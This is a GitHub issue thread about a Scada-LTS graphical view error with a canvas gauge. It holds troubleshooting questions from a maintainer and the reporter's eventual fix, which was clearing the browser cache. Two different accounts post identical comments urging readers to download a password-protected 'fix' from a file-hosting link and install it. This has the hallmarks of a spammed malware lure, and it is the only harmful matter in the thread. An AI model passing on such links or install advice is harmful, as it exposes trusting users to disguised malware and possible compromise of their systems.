SCADA-LTS/Scada-LTS #2997: Problem On Graphical View, Server Side Problem

subairi, 2024-08-27:
**Describe the bug**
Best regards,
I have a problem with the server side display when I add a gauge display according to the instructions from the following website there is an error popup can't find point view  #C3.
 [](https://forum-scadabr-com-br.translate.goog/t/insert-canvas-gauge-in-a-scadabr-view/3856?_x_tr_hist=true&_x_tr_sl=pt&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=sc&_x_tr_sch=http)

**Desktop :**
 - OS: [Win-11]
 - Browser [Opera ]
 - Version [122]

[image]

this problem sometimes works, but often errors.
how to fix that?, tanks a lot

subairi, 2024-08-27:
https://forum-scadabr-com-br.translate.goog/t/insert-canvas-gauge-in-a-scadabr-view/3856?_x_tr_hist=true&_x_tr_sl=pt&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=sc&_x_tr_sch=http

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Limraj, 2024-08-27:
Hi @subairi,
1. We do not support Opera, we recommend Chrome or Firefox.
2. I assumed this was a reliable and safe source and followed this instruction:
https://forum.scadabr.com.br/t/insert-canvas-gauge-in-a-scadabr-view/3856
This worked for me:
[image]
3. Which version of Scada-LTS are you using?
4. I suggest creating a new clean view, because I see that you have some other components on it, this error may concern another component.

Regards,
Kamil Jarmusik

subairi, 2024-09-05:
Thank you, the problem has been resolved by clearing the browser history and cache

closed 2024-09-05 by Limraj